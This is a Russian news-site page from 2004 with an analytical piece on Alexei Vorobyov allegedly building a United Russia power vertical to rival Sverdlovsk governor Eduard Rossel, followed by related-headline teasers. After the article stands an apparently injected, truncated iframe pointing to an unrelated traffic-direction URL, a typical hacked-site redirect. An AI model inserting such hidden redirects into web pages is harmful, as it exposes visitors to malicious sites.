09.07.2004, 12:47

Алексей Воробьев выстраивает альтернативную систему власти в Свердловской области

Наблюдатели продолжают оценивать попытки председателя областного правительства Алексея Воробьева укрепить «Единую Россию» за счет приема в партию руководителей муниципальных образований.
По мнению аналитиков, выстраивание альтернативной властной вертикали не может иметь целью укрепление существующей системы государственной власти. Политическая ситуация в Свердловской области такова, что практически все главы муниципальных образований и руководители промышленных предприятий и так контролируются Эдуардом Росселем. Для осуществления этого контроля никакие дополнительны структуры ему не нужны.
В этом случае возникает закономерный вопрос: зачем нужен ещё один рычаг воздействия на мэров, с какой целью председатель областного правительства выстраивает еще одну, партийную властную вертикаль?
Наблюдатели полагают, что ответ очевиден – Алексей Воробьев пытается выстроить собственную систему власти, которой он мог бы руководить без ведома и одобрения Эдуарда Росселя.
Напомним, что ещё несколько месяцев назад Алексей Воробьев, считавшийся «преемником» Эдуарда Росселя, по всей видимости, был уверен, что полностью контролирует всю систему государственной власти в Свердловской области. Все альтернативные центры влияния в структурах самой областной власти казались полностью подавленными. Он имел влиятельных союзников в лице главы администрации губернатора Вениамина Голубицкого и крупных ФПГ. Казалось, что именно он имеет все шансы стать следующим губернатором Свердловской области.
Однако за последние 2 месяца ситуация изменилась кардинальным образом. «Старая гвардия» губернатора взяла реванш. Эдуард Россель наглядно продемонстрировал, что практически властные ресурсы, имевшиеся у Алексея Воробьева могут быть в любой момент у него отобраны, а сам областной премьер – оказаться на краю отставки и политической смерти.
За последние месяцы самому Алексею Воробьеву стало понятно, что как бы он не укреплял свои позиции в системе государственной власти, он всегда буде уязвимым для Эдуарда Росселя, который по своему статусу способен «обрубить» все рычаги влияния областного премьера.
Алексей Воробьев, который, по всей видимости, сам хочет стать губернатором Свердловской области, принимает решение о создании параллельного властного ресурса, который был бы подконтролен только ему. Такой ресурс должен исключать возможность вмешательства Эдуарда Росселя. Очевидно, что таким ресурсом стала партия «Единая Россия». Она же должна была обеспечить Воробьеву независимость от губернатора: если Россель всегда может одним росчерком пера отправить Воробьева в отставку с поста областного премьера, то ему будет не так просто снять его с поста председателя политсовета «Единой России». В любом случае, такая попытка будет сопровождаться грандиозным политическим скандалом.
Первые шаги по выстраиванию параллельной властной вертикали, мы видим уже сейчас: в «Единую Россию» в массовом порядке принимаются мэры муниципальных образований. Руководители крупных предприятий или уже состоят в партии или находятся на грани вступления в неё.
Теоретически, нельзя исключить ситуацию, при которой уже в ближайшем будущем, в отсутствие Эдуарда Росселя (который регулярно отбывает с визитами в зарубежные страны) Алексей Воробьев может собрать партактив и от имени «партии власти» и президента поставить задачи, в корне расходящиеся с линией губернатора.
Впрочем, даже если Алексею Воробьеву не удастся совершить в области своеобразный переворот в духе советских партсъездов, он все равно получит в свои руки мощный ресурс, с помощью которого сможет общаться с Эдуардом Росселем на в режиме подчинения, а в режиме диалога и политического торга.
Как бы то ни было, очевидно одно – укрепление партийной структуры «Единой России» в данный момент уменьшает шансы Эдуарда Росселя остаться единственным реальным политическим лидером Свердловской области.
<iframe src="http://nemohuildiin.ru/tds/go

Похожие новости по теме
09.07.2004, 12:07

«Параллельная» власть Воробьева

Председатель областного правительства и, по совместительству, председатель политсовета СРО «Единой России» Алексей Воробьев прилагает все усилия к тому, чтобы в Свердловской области произошло...

09.07.2004, 09:45

Алексей Воробьев выстраивает альтернативную систему власти в Свердловской области

Наблюдатели продолжают оценивать попытки председателя областного правительства Алексея Воробьева укрепить «Единую Россию» за счет приема в партию руководителей муниципальных образований. По мнению...

08.07.2004, 14:18

Алексей Воробьев создает альтернативную систему власти

Алексей Воробьев продолжает строительство в Свердловской области «эксклюзивной» властной структуры, которая будет фактически дублировать существующую вертикаль государственной власти. По мнению ряда...

29.06.2004, 10:11

В конфликт Росселя и Воробьева может быть втянута «Единая Россия»

Становятся известными новые подробности визита Алексея Воробьева на конференцию МКС «Единой России» в Челябинск. Как сообщает наш собственный источник, близкий к руководству МКС, помимо выступления с...

25.06.2004, 10:26

Областные власти ищут замену Алексею Воробьеву

Согласно информации, распространенной рядом СМИ, в структурах областной власти начался процесс поиска преемника Алексею Воробьеву на посту председателя областного правительства. По мнению собственных...


Мастрид
Погода на неделю
Популярные новости
Новости по дням
Новости по месяцам